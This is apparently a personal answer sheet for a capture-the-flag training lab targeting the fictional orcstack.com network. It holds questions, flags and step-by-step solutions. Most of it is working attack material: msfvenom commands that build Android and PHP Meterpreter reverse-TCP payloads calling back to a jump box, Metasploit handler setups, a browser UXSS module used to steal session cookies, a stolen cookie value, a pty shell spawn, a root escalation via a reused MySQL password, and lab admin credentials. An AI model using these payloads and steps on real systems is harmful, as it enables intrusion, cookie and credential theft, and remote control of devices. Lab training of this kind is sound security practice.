10.2.2.2port 5208010.2.2.2ssh -i ~/Downloads/netwars.priv -R 52080:l

1. 10.2.2.2
2.  
3. port 52080
4.  
5. 10.2.2.2
6.  
7. ssh -i ~/Downloads/netwars.priv -R 52080:localhost:52080 lurkers@netwars-ng.counterhack.com
8.  
9. alias jumpbox='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201'
10. alias proxy='ssh -i ~/netwars.priv aoluser927@netwars-ng.counterhack.com -p 62201 -D 8080 -N'
11.  
12.  
13. level 3
14. ---------------------------
15. Question 1
16. ---------------------------
17. Register for an account from www.orcstack.com. What is the User Agent (entire line, beginning with "User-Agent: ") of the Android device that connects using the "Deploy URL" page?
18.  
19. Target: android-web.orcstack.com
20.  
21. In order to see the HTTP traffic of the Android device, you need either a Man-in-the-Middle, have access to the HTTP client, or be the destination. Of these three options, as of now you only have access to the last option. Be sure to form the URL using the IP address of the SSH jump box you're currently connected to.
22. The HTTP protocol specifies the HTTP client sends the request (including its User Agent) upon making a TCP connection. You need to set up a TCP listener on a high unused port* of the SSH jump box and create a URL to the IP and port of your TCP listener. * You need to use a high port because you're not root (which is required to listen on ports below 1024, and because your SSH jump box is shared with other people you may need to choose a different port if the one you chose was already in use.
23. ---------------------------
24. Solution:
25.  
26. fire off a listener on your jump box.
27. nc -lvp 12345
28.  
29. Submit a link to the website:
30. http://10.2.2.2
31.  
32. User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VMware Virtual Platform Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
33.  
34. ---------------------------
35. Question 2
36. ---------------------------
37. What is the flag located at /data/data/flag.txt?
38.  
39. Target: android-apk.orcstack.com
40.  
41. In the android-web questions, you entered a URL that an Android device would browse to using a mobile web browser. In this question, you'll enter a URL to an APK file that a different Android device will install and run. Using that Android program, you'll need to gain some kind of shell access, elevate your privileges, and read /data/data/flag.txt on the Android device itself. You may have used Metasploit and msfvenom to create EXE files that "phone home" with Meterpreter when run on Windows targets, or PHP files that do the same when interpreted on PHP servers. Similarly, msfvenom can create APK files that have an Android Meterpreter on them.
42. ---------------------------
43. Solution:
44.  
45. msfvenom -p android/meterpreter/reverse_tcp LHOST=10.2.2.2 LPORT=52080 R > boom.apk
46.  
47. http://10.2.2.2/~lurkers/boom.apk
48.  
49. use exploit/multi/handler
50. set payload android/meterpreter/reverse_tcp
51. set lhost 0.0.0.0
52. set lport 52080
53. exploit -j
54.  
55. adb root
56. cat /data/data/flag.txt
57. e2415cb7f63df0c9de23362326ad3c37a9adfc96
58.  
59. ---------------------------
60. Question 3
61. ---------------------------
62. A common password management application is installed on this Android device. Recover a flag stored in plain text inside a database used by this application.
63.  
64. Target: android-apk.orcstack.com
65.  
66. You'll need to have already answered the previous question to have the necessary access to the Android device to answer this question. First, find the correct application folder under /data/data. Then, transfer the entire folder and its contents using tar and netcat back to your home folder on the SSH jump box. Finally, examine the database inside that folder carefully.
67.  
68. ---------------------------
69. Solution:
70.  
71. cd /data/data/com.easylogics.safe.keeper.password.secure/databases/
72. sqlite3 SafeKeeper
73. .dump
74. cedf6dc6b8893245ac066589860274fe80e6370f
75.  
76. ---------------------------
77. Question 4
78. ---------------------------
79. Using the credentials gathered in answering another question, log in to www.orcstack.com and access the Dashboard to find an unpublished page containing a flag.
80.  
81. Target: www.orcstack.com
82. ---------------------------
83. Solution:
84.  
85. http://www.orcstack.com/Admin
86. administrator
87. Uruk-Hai
88. 80b4a4e3cbc8827b579b9873c5efd8d6bd7c977e
89.  
90. ---------------------------
91. Question 5
92. ---------------------------
93. Using the credentials gathered in answering another question, log in to www.orcstack.com and find a SHA1 hash used as a key to send commands to the development server over HTTP.
94.  
95. Target: www.orcstack.com
96.  
97. This question requires thorough pillaging of information under the Dashboard of the web server on www.orcstack.com.
98. How do the "Deploy URL" and "Deploy APK" pages work?
99. ---------------------------
100. Solution:
101. look in workflows tabs after logging in
102. type=apk
103. url={Content.Fields.AndroidAPK.URL}
104. name={Content.Fields.AndroidAPK.ApplicationName}
105. key=5c9b478a5576dbf8537adfc9ebf075c613ce022e
106.  
107. ---------------------------
108. Question 6
109. ---------------------------
110. Exploit a vulnerability in the Android version used for the "Deploy URL" capability of www.orcstack.com to gain access to the web cookies for http://blog.orcstack.com/. Use those cookies to gain access to a flag located in a non-Published page.
111.  
112. Target: blog.orcstack.com
113.  
114. Unless there's a Universal Cross-Site Scripting flaw, normally a web browser accessing (for example) http://google.com/ would never reveal cookies for a separate domain such as http://bing.com/. What Android version is being used by this device?
115. msf > info auxiliary/gather/android_stock_browser_uxss The above module is effective against this Android device. Use the msfconsole utility to select this module and then use the "Deploy URL" capability of www.orcstack.com to gather the cookies for http://blog.orcstack.com/. Once you've done this, add the same cookies to your local browser, configure your local browser to use an SSH proxy so it can connect to the Orc Stack DMZ, then browse to http://blog.orcstack.com.
116. ---------------------------
117. Solution:
118. use auxiliary/gather/android_stock_browser_uxss
119. set SRVPORT 50790
120. set TARGET_URLS http://blog.orcstack.com
121. set ssl true
122.  
123. edit cookie:
124. name: SESSd2caba14ddc97ae8122a3d641304185c
125. content: b2MREdZCPAoa9bvseV3QWCfqlgyDTOOW-iUXwR6rvIA
126.  
127. 669edf6917c00d6c298676be757fef05634c614b
128. ---------------------------
129. Question 7
130. ---------------------------
131. Use an authenticated administrative web session on http://blog.orcstack.com/ to gain shell access as a limited user, then submit the contents of /flag.txt.
132.  
133. Target: blog.orcstack.com
134. ---------------------------
135. Solution:
136. msfvenom -p php/meterpreter_reverse_tcp LHOST=10.2.2.2 LPORT=21455 -f raw > shell.php
137.  
138. use multi/handler
139. set payload php/meterpreter_reverse_tcp
140. set lhost 0.0.0.0
141. set lport 21455
142. run -j
143.  
144. cat /flag.txt
145. 4c9ef22b86ca78e8d265e007128b449f4a9ef68c
146. ---------------------------
147. Question 8
148. ---------------------------
149. Gain root privileges on blog.orcstack.com and submit the contents of /root/flag.txt.
150.  
151. Target: blog.orcstack.com
152. ---------------------------
153. Solution:
154.  
155. cat /usr/local/bin/mysql-connect.sh
156. mysql --column-names --compress --host=localhost --wait -u root --password="DwarfTosser"
157. mysql --host=localhost -u root --password="DwarfTosser"
158.  
159. /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
160.  
161. su
162. DwarfTosser
163.  
164. cat /root/flag.txt
165.  
166. a74687bbf8d6d21d555680bb98b6e1f9bf498d58
167. ---------------------------
168. Question 9-10?
169. ---------------------------
170. Using information found in answering another question, find the credentials to a service on www.orcstack.com, then submit the flag found inside.
171.  
172. Target: www.orcstack.com
173. ---------------------------
174. Solution:
175.  
176. 67836526fe7fcce735af56939378d7b1fd7e2f38
177.  
178. System Login:
179. psexec to www with
180. Username: Administrator
181. Password: Magical_Unicorns
182.  
183. 67836526fe7fcce735af56939378d7b1fd7e2f38